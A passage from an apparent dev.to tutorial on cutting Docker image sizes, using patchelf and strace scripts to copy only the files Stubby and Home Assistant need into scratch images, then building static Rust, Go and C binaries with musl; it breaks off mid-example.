&lt;p&gt;As you can see from the output, the rpath is empty on Debian and &lt;code&gt;/bin/sh&lt;/code&gt; depends only on libc. The output of the same commands on Guix is quite different. This is just an example; we will not dive into why Guix uses a non-empty rpath.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Guix&lt;/span&gt;
🌊 readelf &lt;span class="nt"&gt;--headers&lt;/span&gt; /bin/sh | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-A2&lt;/span&gt; INTERP
  INTERP         0x0000000000000318 0x0000000000400318 0x0000000000400318
                 0x0000000000000050 0x0000000000000050  R      0x1
      &lt;span class="o"&gt;[&lt;/span&gt;Requesting program interpreter: /gnu/store/gsjczqir1wbz8p770zndrpw4rnppmxi3-glibc-2.35/lib/ld-linux-x86-64.so.2]
🌊 readelf &lt;span class="nt"&gt;--dynamic&lt;/span&gt; /bin/sh | &lt;span class="nb"&gt;grep &lt;/span&gt;RUNPATH
 0x000000000000001d &lt;span class="o"&gt;(&lt;/span&gt;RUNPATH&lt;span class="o"&gt;)&lt;/span&gt;            Library runpath: &lt;span class="o"&gt;[&lt;/span&gt;/gnu/store/lxfc2a05ysi7vlaq0m3w5wsfsy0drdlw-readline-8.1.2/lib:/gnu/store/bcc053jvsbspdjr17gnnd9dg85b3a0gy-ncurses-6.2.20210619/lib:/gnu/store/gsjczqir1wbz8p770zndrpw4rnppmxi3-glibc-2.35/lib:/gnu/store/930nwsiysdvy2x5zv1sf6v7ym75z8ayk-gcc-11.3.0-lib/lib:/gnu/store/930nwsiysdvy2x5zv1sf6v7ym75z8ayk-gcc-11.3.0-lib/lib/gcc/x86_64-unknown-linux-gnu/11.3.0/../../..]
🌊 ldd /bin/sh
        linux-vdso.so.1 &lt;span class="o"&gt;(&lt;/span&gt;0x00007ffe777f6000&lt;span class="o"&gt;)&lt;/span&gt;
        libreadline.so.8 &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; /gnu/store/lxfc2a05ysi7vlaq0m3w5wsfsy0drdlw-readline-8.1.2/lib/libreadline.so.8 &lt;span class="o"&gt;(&lt;/span&gt;0x00007efca9070000&lt;span class="o"&gt;)&lt;/span&gt;
        libhistory.so.8 &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; /gnu/store/lxfc2a05ysi7vlaq0m3w5wsfsy0drdlw-readline-8.1.2/lib/libhistory.so.8 &lt;span class="o"&gt;(&lt;/span&gt;0x00007efca9063000&lt;span class="o"&gt;)&lt;/span&gt;
        libncursesw.so.6 &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; /gnu/store/bcc053jvsbspdjr17gnnd9dg85b3a0gy-ncurses-6.2.20210619/lib/libncursesw.so.6 &lt;span class="o"&gt;(&lt;/span&gt;0x00007efca8ff1000&lt;span class="o"&gt;)&lt;/span&gt;
        libgcc_s.so.1 &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; /gnu/store/930nwsiysdvy2x5zv1sf6v7ym75z8ayk-gcc-11.3.0-lib/lib/libgcc_s.so.1 &lt;span class="o"&gt;(&lt;/span&gt;0x00007efca8fd7000&lt;span class="o"&gt;)&lt;/span&gt;
        libc.so.6 &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; /gnu/store/gsjczqir1wbz8p770zndrpw4rnppmxi3-glibc-2.35/lib/libc.so.6 &lt;span class="o"&gt;(&lt;/span&gt;0x00007efca8dd9000&lt;span class="o"&gt;)&lt;/span&gt;
        /gnu/store/gsjczqir1wbz8p770zndrpw4rnppmxi3-glibc-2.35/lib/ld-linux-x86-64.so.2 &lt;span class="o"&gt;(&lt;/span&gt;0x00007efca90c9000&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Motivating example: Stubby
&lt;/h2&gt;

&lt;p&gt;Let's use &lt;code&gt;patchelf&lt;/code&gt; to reduce the Docker image size for &lt;a href="https://dnsprivacy.org/dns_privacy_daemon_-_stubby/"&gt;Stubby&lt;/a&gt; — a name resolver that supports DNS-over-TLS. We will use Debian as the base image, but the process is specific neither to this Linux distribution nor to this application.&lt;/p&gt;

&lt;p&gt;First we write a Dockerfile that, in the first stage, installs Stubby and the required packages from the Debian repositories, and, in the second stage, copies only the necessary files into a final image created from scratch.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;FROM debian:latest AS builder

&lt;span class="c"&gt;# install stubby and patchelf&lt;/span&gt;
RUN apt-get update &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt-get &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-y&lt;/span&gt; stubby ca-certificates patchelf

&lt;span class="c"&gt;# copy and run patchelf script&lt;/span&gt;
COPY patchelf.sh /tmp/patchelf.sh
RUN /tmp/patchelf.sh

&lt;span class="c"&gt;# create the final image from scratch (i.e. without the base image)&lt;/span&gt;
FROM scratch

&lt;span class="c"&gt;# copy only the /out directory that contains the files that are actually used by stubby&lt;/span&gt;
COPY &lt;span class="nt"&gt;--from&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;builder /out /

EXPOSE 53/udp
EXPOSE 53/tcp

CMD &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"/bin/stubby"&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Second we write the &lt;code&gt;patchelf&lt;/code&gt; script that determines which files need to be copied. The script copies all the dependencies, the program interpreter, the binary itself and its configuration file, and finally the OpenSSL library's configuration files and the list of trusted SSL certificates.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;#!/bin/sh&lt;/span&gt;
&lt;span class="nb"&gt;set&lt;/span&gt; &lt;span class="nt"&gt;-ex&lt;/span&gt;
&lt;span class="nb"&gt;mkdir&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt; /out/lib /out/bin /out/etc /out/var/cache/stubby /out/var/run /out/usr/lib
&lt;span class="c"&gt;# copy the libraries that stubby uses&lt;/span&gt;
ldd /usr/bin/stubby |
    &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="nt"&gt;-rne&lt;/span&gt; &lt;span class="s1"&gt;'s/.*=&amp;gt; (.*) \(.*\)$/\1/p'&lt;/span&gt; |
    &lt;span class="k"&gt;while &lt;/span&gt;&lt;span class="nb"&gt;read&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; path&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
        &lt;/span&gt;&lt;span class="nb"&gt;cp&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$path&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; /out/lib
    &lt;span class="k"&gt;done&lt;/span&gt;
&lt;span class="c"&gt;# copy the interpreter&lt;/span&gt;
&lt;span class="nb"&gt;cp&lt;/span&gt; /lib64/ld-linux-x86-64.so.2 /out/lib
&lt;span class="c"&gt;# copy stubby and its configuration file&lt;/span&gt;
&lt;span class="nb"&gt;cp&lt;/span&gt; /usr/bin/stubby /out/bin/stubby
&lt;span class="c"&gt;# make stubby listen on all addresses to access it from outside the container&lt;/span&gt;
&lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="s1"&gt;'s/127\.0\.0\.1/0.0.0.0/g'&lt;/span&gt; /etc/stubby/stubby.yml
&lt;span class="nb"&gt;cp&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; /etc/stubby /out/etc/stubby
&lt;span class="c"&gt;# copy openssl library configuration and certificates&lt;/span&gt;
&lt;span class="nb"&gt;cp&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; /etc/ssl /out/etc/ssl
&lt;span class="nb"&gt;cp&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; /usr/lib/ssl /out/usr/lib/ssl
find /out/etc/ssl/certs &lt;span class="nt"&gt;-not&lt;/span&gt; &lt;span class="nt"&gt;-type&lt;/span&gt; d &lt;span class="nt"&gt;-not&lt;/span&gt; &lt;span class="nt"&gt;-name&lt;/span&gt; ca-certificates.crt &lt;span class="nt"&gt;-delete&lt;/span&gt;
&lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-rf&lt;/span&gt; /out/usr/lib/ssl/misc
&lt;span class="c"&gt;# patch stubby binary to use the copied interpreter and libraries&lt;/span&gt;
patchelf &lt;span class="nt"&gt;--set-interpreter&lt;/span&gt; /lib/ld-linux-x86-64.so.2 &lt;span class="nt"&gt;--set-rpath&lt;/span&gt; /lib /out/bin/stubby
ldd /out/bin/stubby
find /out
&lt;span class="c"&gt;# check that stubby works&lt;/span&gt;
&lt;span class="nb"&gt;chroot&lt;/span&gt; /out /bin/stubby &lt;span class="nt"&gt;-V&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now we build the image and check that it runs correctly.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;🌊 docker build &lt;span class="nt"&gt;--tag&lt;/span&gt; stubby:debian-patchelf &lt;span class="nb"&gt;.&lt;/span&gt;
🌊 docker inspect &lt;span class="nt"&gt;-f&lt;/span&gt; &lt;span class="s2"&gt;"{{ .Size }}"&lt;/span&gt; stubby:debian-patchelf
13120030
🌊 docker run &lt;span class="nt"&gt;--init&lt;/span&gt; &lt;span class="nt"&gt;--rm&lt;/span&gt; &lt;span class="nt"&gt;--publish&lt;/span&gt; 53:53/udp stubby:debian-patchelf stubby &lt;span class="nt"&gt;-l&lt;/span&gt;
&lt;span class="c"&gt;# in the other terminal window&lt;/span&gt;
🌊 dig @127.0.0.1 +short google.com
142.251.220.206
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Results
&lt;/h2&gt;

&lt;p&gt;We compare the resulting image sizes using the &lt;code&gt;docker inspect&lt;/code&gt; command. The competing images are Debian-based and Alpine-based images created without the &lt;code&gt;patchelf&lt;/code&gt; script.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Image&lt;/th&gt;
&lt;th&gt;Size, MiB&lt;/th&gt;
&lt;th&gt;Size, %&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;stubby:debian-patchelf&lt;/td&gt;
&lt;td&gt;12.5&lt;/td&gt;
&lt;td&gt;9% of stubby:debian&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;stubby:debian&lt;/td&gt;
&lt;td&gt;143.4&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;stubby:alpine-patchelf&lt;/td&gt;
&lt;td&gt;9.0&lt;/td&gt;
&lt;td&gt;64% of stubby:alpine&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;stubby:alpine&lt;/td&gt;
&lt;td&gt;14.1&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The results speak for themselves. By including only the files that Stubby actually uses, we reduced the size of the Debian-based Stubby image &lt;strong&gt;by 91%&lt;/strong&gt; and of the Alpine-based Stubby image &lt;strong&gt;by 36%&lt;/strong&gt;. Impressive.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Limitations
&lt;/h2&gt;

&lt;p&gt;Patchelf fully automates copying the dependencies and the program interpreter; however, any other files need to be copied manually. Also, if your program is not compiled to an ELF binary (e.g. NodeJS, Python) then you're out of luck. This is where strace can help.&lt;/p&gt;

&lt;h1&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Strace
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fovzzxaqwf9v79jvlkfge.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fovzzxaqwf9v79jvlkfge.jpg" alt="Photo by Lance Grandahl on Unsplash." width="640" height="480"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This tool intercepts the system calls the binary makes and prints their arguments. Strace uses the same kernel API as debuggers and may considerably slow down the traced program. Luckily, we use this tool only at the Docker image build stage.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Motivating example: Home Assistant
&lt;/h2&gt;

&lt;p&gt;This is the image that I failed to install on a Raspberry Pi Zero using the official Docker image. When you pull this image, Docker downloads its many layers in parallel and then fails to extract them due to a lack of disk space. To pull and run it at all, I had to temporarily attach an external USB drive, move the &lt;code&gt;/var/lib/docker&lt;/code&gt; directory there, pull the image, and then move the directory back to the Raspberry Pi.&lt;/p&gt;

&lt;p&gt;Now we create a new Docker image for Home Assistant that has only one layer and consumes only a fraction of the disk space of the original image.&lt;/p&gt;

&lt;p&gt;First we create a Dockerfile with the official image as the base.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;FROM ghcr.io/home-assistant/home-assistant:stable AS builder

RUN apk update &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apk add strace

COPY strace.sh /tmp/strace.sh
RUN /tmp/strace.sh

FROM scratch

COPY &lt;span class="nt"&gt;--from&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;builder /out /

&lt;span class="c"&gt;# default Home Assistant port&lt;/span&gt;
EXPOSE 8123/tcp

&lt;span class="c"&gt;# default Home Assistant command&lt;/span&gt;
CMD &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"/usr/local/bin/python3"&lt;/span&gt;, &lt;span class="s2"&gt;"-m"&lt;/span&gt;, &lt;span class="s2"&gt;"homeassistant"&lt;/span&gt;, &lt;span class="s2"&gt;"--config"&lt;/span&gt;, &lt;span class="s2"&gt;"/config"&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then we write the &lt;code&gt;strace&lt;/code&gt; script that finds all the files accessed by Home Assistant and copies them into the final image.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;#!/bin/sh&lt;/span&gt;
&lt;span class="nb"&gt;set&lt;/span&gt; &lt;span class="nt"&gt;-ex&lt;/span&gt;
&lt;span class="nb"&gt;mkdir&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt; /out/lib /out/usr/local/bin /out/usr/bin /out/usr/local/lib
&lt;span class="c"&gt;# copy ffmpeg and its dependencies&lt;/span&gt;
ldd /usr/bin/ffmpeg |
    &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="nt"&gt;-rne&lt;/span&gt; &lt;span class="s1"&gt;'s/.*=&amp;gt; (.*) \(.*\)$/\1/p'&lt;/span&gt; |
    &lt;span class="k"&gt;while &lt;/span&gt;&lt;span class="nb"&gt;read&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; path&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
        &lt;/span&gt;&lt;span class="nb"&gt;cp&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$path&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; /out/lib
    &lt;span class="k"&gt;done
&lt;/span&gt;&lt;span class="nb"&gt;cp&lt;/span&gt; /lib/ld-musl-x86_64.so.1 /out/lib
&lt;span class="nb"&gt;cp&lt;/span&gt; /usr/local/bin/python3 /out/usr/local/bin/python3
&lt;span class="nb"&gt;cp&lt;/span&gt; /usr/bin/ffmpeg /out/usr/bin/ffmpeg
&lt;span class="c"&gt;# copy frontend files manually&lt;/span&gt;
&lt;span class="nb"&gt;mkdir&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt; /out/usr/local/lib/python3.11/site-packages
&lt;span class="nb"&gt;cp&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; /usr/local/lib/python3.11/site-packages/hass_frontend /out/usr/local/lib/python3.11/site-packages/hass_frontend
&lt;span class="c"&gt;# copy all the files that home assistant actually opens&lt;/span&gt;
strace &lt;span class="nt"&gt;-f&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; open,stat,lstat &lt;span class="nb"&gt;timeout &lt;/span&gt;30s python3 &lt;span class="nt"&gt;-m&lt;/span&gt; homeassistant &lt;span class="nt"&gt;--config&lt;/span&gt; /config 2&amp;gt;&amp;amp;1 |
    &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="nt"&gt;-rne&lt;/span&gt; &lt;span class="s1"&gt;'s/.*(open|stat)\(.*"([^"]+)".*/\2/p'&lt;/span&gt; |
    &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-vE&lt;/span&gt; &lt;span class="s1"&gt;'^/(dev|proc|sys|tmp)'&lt;/span&gt; |
    &lt;span class="nb"&gt;sort&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; |
    &lt;span class="k"&gt;while &lt;/span&gt;&lt;span class="nb"&gt;read&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; path&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
        if&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt; &lt;span class="nb"&gt;test&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$path&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;then
            continue
        fi
        if &lt;/span&gt;&lt;span class="nb"&gt;test&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$path&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;then&lt;/span&gt;
            &lt;span class="c"&gt;# create directories&lt;/span&gt;
            &lt;span class="nb"&gt;mkdir&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt; /out/&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$path&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
        &lt;span class="k"&gt;else&lt;/span&gt;
            &lt;span class="c"&gt;# copy files&lt;/span&gt;
            &lt;span class="nb"&gt;mkdir&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt; /out/&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;dirname&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$path&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
            &lt;span class="nb"&gt;cp&lt;/span&gt; &lt;span class="nt"&gt;-n&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$path&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; /out/&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$path&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; 2&amp;gt;/dev/null &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="nb"&gt;true
        &lt;/span&gt;&lt;span class="k"&gt;fi
    done&lt;/span&gt;
&lt;span class="c"&gt;# recreate config directory&lt;/span&gt;
&lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-rf&lt;/span&gt; /out/config
&lt;span class="nb"&gt;mkdir&lt;/span&gt; /out/config
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now we build the image and check that it runs correctly.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;🌊 docker build &lt;span class="nt"&gt;--tag&lt;/span&gt; home-assistant:strace &lt;span class="nb"&gt;.&lt;/span&gt;
🌊 docker run &lt;span class="nt"&gt;--rm&lt;/span&gt; &lt;span class="nt"&gt;--publish&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;8123:8123/tcp home-assistant:strace &lt;span class="se"&gt;\&lt;/span&gt;
    python3 &lt;span class="nt"&gt;-m&lt;/span&gt; homeassistant &lt;span class="nt"&gt;--config&lt;/span&gt; /config
&lt;span class="c"&gt;# now open https://127.0.0.1:8123/ in the browser&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Results
&lt;/h2&gt;

&lt;p&gt;We compare the resulting image size to the original image using the &lt;code&gt;docker inspect&lt;/code&gt; command.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Image&lt;/th&gt;
&lt;th&gt;Size, MiB&lt;/th&gt;
&lt;th&gt;Size, %&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;home-assistant:strace&lt;/td&gt;
&lt;td&gt;590&lt;/td&gt;
&lt;td&gt;31&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ghcr.io/home-assistant/home-assistant:stable&lt;/td&gt;
&lt;td&gt;1886&lt;/td&gt;
&lt;td&gt;100&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;We were able to reduce the image size &lt;strong&gt;by 69%&lt;/strong&gt;. Most importantly, the Raspberry Pi Zero can now pull and run the new image without hitting the disk space limit.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Limitations
&lt;/h2&gt;

&lt;p&gt;The obvious limitation of &lt;code&gt;strace&lt;/code&gt; is that the frontend files are not copied automatically, because they are read only when an HTTP request is made. Of course, we could make some HTTP requests with curl, but usually all frontend files are needed, so it is much easier to just copy them all into the final image.&lt;/p&gt;

&lt;h1&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Your own images
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs0syia4loo8kwd52eozf.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs0syia4loo8kwd52eozf.jpg" alt="Photo by Levi Guzman on Unsplash." width="640" height="427"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Dealing with your own Docker images is much easier than with third-party ones. You either compile your program into a static binary, or compile it into a dynamically linked binary and use the &lt;code&gt;patchelf&lt;/code&gt; tool to copy the dependencies and the interpreter. In this section we show how to compile static binaries for Rust, Go and C/C++. The general approach is to use the &lt;a href="https://www.musl-libc.org/"&gt;musl&lt;/a&gt; library and the accompanying &lt;code&gt;musl-gcc&lt;/code&gt; tool to build your project, but some languages make it simpler.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Rust static binaries
&lt;/h2&gt;

&lt;p&gt;In order to use the musl library in your project, you need to add the musl target to your toolchain and then compile for that target.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;🌊 rustup toolchain add stable &lt;span class="nt"&gt;--target&lt;/span&gt; x86_64-unknown-linux-musl 
&lt;span class="c"&gt;# here we remove debugging information and optimize for size&lt;/span&gt;
🌊 &lt;span class="nb"&gt;env &lt;/span&gt;&lt;span class="nv"&gt;RUSTFLAGS&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'-Copt-level=z -Cstrip=symbols'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    cargo build &lt;span class="nt"&gt;--release&lt;/span&gt; &lt;span class="nt"&gt;--target&lt;/span&gt; x86_64-unknown-linux-musl
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now we build a Docker image that includes only the resulting binary file.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;FROM scratch
COPY target/x86_64-unknown-linux-musl/release/app /bin/app
CMD &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"/bin/app"&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;As you can see, the resulting image contains only the binary and no separate dependencies: they are all statically linked into the binary itself. This means that Docker is merely a distribution format for static binaries.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Go static binaries
&lt;/h2&gt;

&lt;p&gt;Go does not use musl: when cgo is disabled, the Go runtime provides its own static implementation of the functionality usually supplied by libc. This makes compiling static binaries even simpler.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;🌊 &lt;span class="nb"&gt;env &lt;/span&gt;&lt;span class="nv"&gt;CGO_ENABLED&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0 go build &lt;span class="nt"&gt;-ldflags&lt;/span&gt; &lt;span class="s1"&gt;'-s -w'&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; app ./cmd/app
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now we build a Docker image similar to the one for the Rust static binary.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;FROM scratch
COPY app /bin/app
CMD &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"/bin/app"&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h1&gt;
  
  
  &lt;a&gt;&lt;/a&gt;C/C++ static binaries
&lt;/h1&gt;

&lt;p&gt;The idea here is to replace the C/C++ compiler with &lt;code&gt;musl-gcc&lt;/code&gt; and enable static compilation in GCC via the &lt;code&gt;-static&lt;/code&gt; linker flag. All the dependencies have to be recompiled this way as well. This makes the approach especially problematic for dependencies that prefer dynamic linking for whatever reason (e.g. they use features of GNU libc that do not support static linking, dynamically load other libraries, or use build instructions so sophisticated that a mere human cannot modify them to enable static linking). That's why the general approach for C/C++ binaries is to use &lt;code&gt;patchelf&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;The following snippet shows how to compile a static binary for a CMake-based project.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;🌊 &lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; CMakeLists.txt &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt;'
project (HelloWorld)
add_executable (app app.c)
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;🌊 &lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; app.c &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt;'
#include &amp;lt;stdio.h&amp;gt;
int main() {
    printf("Hello world&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="sh"&gt;");
    return 0;
}
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;🌊 &lt;span class="nb"&gt;mkdir &lt;/span&gt;build-musl
